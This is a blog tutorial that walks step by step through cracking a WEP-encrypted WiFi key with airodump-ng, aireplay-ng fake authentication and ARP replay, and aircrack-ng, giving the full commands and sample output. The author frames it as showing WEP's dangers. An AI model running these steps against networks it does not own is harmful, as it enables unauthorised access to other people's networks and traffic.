Hacking WEP in under 10 minutes

WEP, also known as Wired Equivalent Privacy is a form of encryption used in early WiFi networks. While its not recommended today they're are still a very high percentage of people still using it. As with most technology people just set it and forget it leaving a high number of under secured networks in the air waves. As always I am not recommending you try hacking your neighbors WiFi networks. This should be done with all of your own equipment.

To start out with we need to find our target network. For this we will use airodump-ng

Run the following command to get started. Replace your interface with the command below. 

airodump-ng wlan1

 The output should look something like this

CH  9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09                                          
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                     
 28:EF:01:26:46:0B  -29       19        1    0   6  54e  WEP   WEP                linksys                      
 28:EF:01:5D:43:58  -42       17        0    0   6  54e  WPA2 CCMP   PSK  NETGEAR                      
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                        
 28:EF:01:26:46:0B  28:EF:01:DB:36:A4  -57    0 - 1      0        1 linksys                                    

As you can see we have an access point using WEP with the SSID "linksys" and we also have a client attached to this access point.

In order for this attack to work we must have traffic in the form of an attached client. While its possible without for this how-to we will be hacking WEP with a client authenticated. We will talk more about hacking WEP without an active client in another article.

First we need to start capturing packets from the access point to do this we will filter out everything but the target access point.

airodump-ng -c 6 --bssid 28:EF:01:26:46:0B -w ./linksys.wep wlan1

The switches to this command are below

-c = channel from the target access point
--bssid = MAC address from the target access point
-w = path and name of capture files. I named mine "linksys.wep" as a descriptive name but the name is irrelevant, make it whatever you want.

The output should look like this. Leave this window open and running.

CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09                                          
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                      
 28:EF:01:26:46:0B  -29       19        1    0   6  54e  WEP   WEP                linksys                       
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                        
 28:EF:01:26:46:0B  28:EF:01:DB:36:A4  -57    0 - 1      0        1 linksys                 

Now we need to fake authentication with the target router. To do this we will use aireplay-ng with the command below in a new terminal window.

aireplay-ng -1 0 -e linksys -a 28:EF:01:26:46:0B -h {adaptor MAC} wlan1

The switches to this command are below.

-1 = Attack mode 1= fake authentication
0 = Delay between attacks
-e = essid of target access point
-a = MAC address of target access point
-h = MAC address from your adaptor (In my case wlan1)

You should get output like this telling you it was successful. 

13:54:17  Waiting for beacon frame (BSSID: 28:EF:01:26:46:0B) on channel 6
13:54:17  Sending Authentication Request (Open System) [ACK]
13:54:17  Authentication successful
13:54:17  Sending Association Request [ACK]
13:54:17  Association successful :-) (AID: 1)

You will also notice your MAC address as now connected to the client in the instance of airodump-ng you have running. If it does not show up in airodump-ng then you may have done something wrong. Just try the above command again and check the essid and MAC address is for the target access point and make sure you are using your right MAC address by typing ifconfig. You need to use the MAC address of the adaptor you are using to perform the attack. If your MAC is spoofed make sure to use the spoofed MAC.

After you run this command you need to run an arp request re-injection attack to create as many IV's as possible. The IV's or initialization vectors are what make WEP so weak. WEP uses a 24 bit IV so since this is so small and transmitted in clear text the IV's are reused and because of that we are able to extrapolate the WEP key if enough of them are captured. Since we don't want to wait ages to collect the required number if IV's, 30 to 40 thousand is what I recommend, we will use aireplay-ng to conduct an arp request re-injection attack to make the access point start spiting out IV's.

Basically what we are doing is listening for arp requests and bouncing them back to the router when we see them. Each time the router will retransmit the arp request with a new IV. These IV's are collected in airodump-ng and can be used in aircrack-ng later.

Now time to have some fun. Type this command below.

aireplay-ng -3 -b 28:EF:01:26:46:0B -h {adaptor} wlan1

The switches to this command are below.

-3 = Attack mode 3 = ARP Request Replay Attack
-b = MAC address of target router
-h = MAC address to your adaptor

The output here depends on how many clients are authenticated. The more traffic the better. If you only have a single client like I did you might have to be patient but after a minute or so the arp requests should start flying. Here is what the output should look like. 

13:57:51  Waiting for beacon frame (BSSID: 28:EF:01:26:46:0B) on channel 6
Saving ARP requests in replay_arp-0520-135751.cap
You should also start airodump-ng to capture replies.
^Cad 152425 packets (got 71155 ARP requests and 40654 ACKs), sent 52101 packets...(499 pps)

I usually wait until I have about 40,000+ ACKs. The more the better. Just be patient and let airodump-ng capture all of those arp replies, they are what contains the IV's we need. 

Once you are happy with what you have hit Ctrl+c to stop the ARP attack. At this point you can also kill airodump-ng or leave it running its up to you. We should have what we need already.

The final step is to run aircrack-ng against the cap file that airodump-ng created while you where doing all of this. 

For that run this command. 

aircrack-ng ./linksys.wep.cap

The output of this command should give you the WEP key as it does below. 

Opening ./linksys.wep.cap
Read 239747 packets.
   #  BSSID              ESSID                     Encryption
   1  28:EF:01:26:46:0B  linksys                    WEP (58246 IVs)
Choosing first network as target.
Opening ./linksys.wep.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 58258 ivs.
                         KEY FOUND! [ F2:C7:BB:35:B9 ] 
        Decrypted correctly: 100%

And that's it. How can it get any easier then that. It took my 1.677Ghz dual core Atom netbook about 2 seconds to find the WEP key once the packets where captured. With practice this entire attack can be done in about 10 minutes or less, and that incudes the time it takes to set up.

Thanks for reading and I hope you enjoyed it. Remember this information is meant to show you the dangers of using WEP encryption it is not intended to teach you how to hack your neighbors router and cause trouble. Please don't use this information to hurt other people. Not only is it illegal but its also not very nice. ;-)


Add comment

Comments do not require an account. Anyone is welcome and encouraged to leave a comment.

However, If you are a spammer all comments require admin approval so your wasting your time and mine.
No one will ever see it. Please stop posting spam.


Filtered HTML

  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <em> <strong> <cite> <blockquote> <code> <ul> <ol> <li> <dl> <dt> <dd>
  • Lines and paragraphs break automatically.

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Enter the characters shown in the image.